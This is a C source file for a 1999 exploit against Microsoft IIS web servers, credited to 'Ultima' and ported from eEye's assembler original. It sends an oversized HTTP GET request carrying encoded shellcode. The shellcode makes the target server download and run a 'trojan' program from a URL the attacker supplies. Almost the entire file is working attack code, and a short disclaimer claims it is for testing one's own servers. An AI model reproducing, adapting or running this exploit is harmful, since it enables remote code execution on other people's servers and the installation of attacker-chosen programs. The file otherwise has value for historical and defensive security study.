/* to compile on solaris: change u_int32_t to uint32_t and type: gcc -o iishack iishack.c -lnsl -lsocket -lresolv */ /***********************************************************/ /* IIS Exploit for Linux (c) 1999 Ultima */ /* ultima@snicker.emoti.com */ /* The original exploit as published by EEye was written */ /* in assembler, and is rather unportable. I wrote it in */ /* C, and it should compile and run on just about anything.*/ /* */ /* THIS IS ONLY FOR TESTING YOUR OWN SERVERS FOR THE */ /* VULNERABILITY. BY RUNNING THIS PROGRAM YOU ASSUME */ /* ALL LIABILITY FOR ANY AND ALL RESULTS CAUSED BY */ /* THIS PROGRAM, WHETHER DIRECT OR INDIRECT. IN NO CASE */ /* SHALL ULTIMA BE HELD RESPONSIBLE. */ /* */ /* Released: 6.16.1999 (Y2K Compliant!! =) */ /* */ /* This code is released under the terms of the LGPL */ /* Version 2 or later, at your discretion. */ /* */ /* The uninitialized egg was evolved from reverse- */ /* engineering the EEye exploit, and was injected into */ /* C. This is basically the same poison, with a different */ /* needle. Thanks to drkspyrit and the EEyes ppl,without */ /* which, this code would have not existed. */ /* He can be reached as barns@eeye.com. */ /* The eEye website is http://www.eEye.com */ /* Usage: ./iishack <server> <port> <trojan> */ /* The trojan is an http url (minus the http://) of a */ /* program you want to run on the server. Server and port */ /* are self-explanitory. */ /* Compiling: cc -o iishack iishack.c */ /* Example: */ /* ./iishack www.notthere.com 80 www.myisp.com/exploit.exe */ /***********************************************************/ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <stdlib.h> #include <arpa/inet.h> #define egglen 1157 #define urloff 1055 unsigned char egg[] = { 71, 69, 84, 32, 47, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 176, 135, 103, 104, 176, 135, 103, 104, 144, 144, 144, 144, 88, 88, 144, 51, 192, 80, 91, 83, 89, 139, 222, 102, 184, 33, 2, 3, 216, 50, 192, 215, 44, 33, 136, 3, 75, 60, 222, 117, 244, 67, 67, 186, 208, 16, 103, 104, 82, 81, 83, 255, 18, 139, 240, 139, 249, 252, 89, 177, 6, 144, 90, 67, 50, 192, 215, 80, 88, 132, 192, 80, 88, 117, 244, 67, 82, 81, 83, 86, 178, 84, 255, 18, 171, 89, 90, 226, 230, 67, 50, 192, 215, 80, 88, 132, 192, 80, 88, 117, 244, 67, 82, 83, 255, 18, 139, 240, 90, 51, 201, 80, 88, 177, 5, 67, 50, 192, 215, 80, 88, 132, 192, 80, 88, 117, 244, 67, 82, 81, 83, 86, 178, 84, 255, 18, 171, 89, 90, 226, 230, 51, 192, 80, 64, 80, 64, 80, 255, 87, 244, 137, 71, 204, 51, 192, 80, 80, 176, 2, 102, 171, 88, 180, 80, 102, 171, 88, 171, 171, 171, 177, 33, 144, 102, 131, 195, 22, 139, 243, 67, 50, 192, 215, 58, 200, 117, 248, 50, 192, 136, 3, 86, 255, 87, 236, 144, 102, 131, 239, 16, 146, 139, 82, 12, 139, 18, 139, 18, 146, 139, 215, 137, 66, 4, 82, 106, 16, 82, 255, 119, 204, 255, 87, 248, 90, 102, 131, 238, 8, 86, 67, 139, 243, 252, 172, 132, 192, 117, 251, 65, 78, 199, 6, 141, 138, 141, 138, 129, 54, 128, 128, 128, 128, 51, 192, 80, 80, 106, 72, 83, 255, 119, 204, 255, 87, 240, 88, 91, 139, 208, 102, 184, 255, 15, 80, 82, 80, 82, 255, 87, 232, 139, 240, 88, 144, 144, 144, 144, 80, 83, 255, 87, 212, 139, 232, 51, 192, 90, 82, 80, 82, 86, 255, 119, 204, 255, 87, 236, 128, 252, 255, 116, 15, 80, 86, 85, 255, 87, 216, 128, 252, 255, 116, 4, 133, 192, 117, 223, 85, 255, 87, 220, 51, 192, 64, 80, 83, 255, 87, 228, 144, 144, 144, 144, 255, 108, 102, 115, 111, 102, 109, 84, 83, 33, 128, 141, 132, 147, 134, 130, 149, 33, 128, 141, 152, 147, 138, 149, 134, 33, 128, 141, 132, 141, 144, 148, 134, 33, 128, 141, 144, 145, 134, 143, 33, 120, 138, 143, 102, 153, 134, 132, 33, 104, 141, 144, 131, 130, 141, 98, 141, 141, 144, 132, 33, 120, 116, 112, 100, 108, 84, 83, 33, 147, 134, 132, 151, 33, 148, 134, 143, 133, 33, 148, 144, 132, 140, 134, 149, 33, 132, 144, 143, 143, 134, 132, 149, 33, 136, 134, 149, 137, 144, 148, 149, 131, 154, 143, 130, 142, 134, 33, 144, 152, 143, 79, 134, 153, 134, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 46, 104, 116, 114, 32, 72, 84, 84, 80, 47, 49, 46, 48, 13, 10, 13, 10, 10 }; u_int32_t resolve(char *host) /* for solaris, try uint32_t */ { struct hostent *he; long n = inet_addr(host); if(n!=-1) return(n); he = gethostbyname(host); if(!he) { herror("gethostbyname"); return(0); } memcpy(&n, he->h_addr, 4); return(*(long *)he->h_addr_list[0]); } int main(int argc, char **argv) { char *server; int port; char *url; int fd; struct sockaddr_in s_in; int i=0,x,j=0; int first=0; if(argc != 4) { fprintf(stderr, "usage: %s <server> <port> <trojan>\n", argv[0]); exit(1); } server = argv[1]; port = atoi(argv[2]); url = argv[3]; if(strlen(url) > 85) { fprintf(stderr, "Trojan name must be less than 85 characters.\n"); exit(1); } for(x=0;x<strlen(url);x++) { if(url[x] == '/' && !first) { first=1; egg[urloff+j]='!'+0x21;egg[urloff+j+1]='G'+0x21;egg[urloff+j+2]='E'+0x21; egg[urloff+j+3]='T'+0x21;egg[urloff+j+4]=' '+0x21;egg[urloff+j+5]='/'+0x21; j+=6; continue; } egg[urloff+j] += url[x]; j++; } fd = socket(AF_INET, SOCK_STREAM, 0); s_in.sin_family = AF_INET; s_in.sin_port = htons(port); s_in.sin_addr.s_addr = resolve(server); connect(fd, (struct sockaddr *)&s_in, sizeof(struct sockaddr_in)); while(i!=egglen) { x=send(fd, egg+i, egglen-i, 0); if(x<0) { fprintf(stderr, "Connection to target lost. WTF?\n"); exit(1); } i+=x; } printf("Trojan uploaded successfully (I think...)\n"); return(0); } /* www.hack.co.za */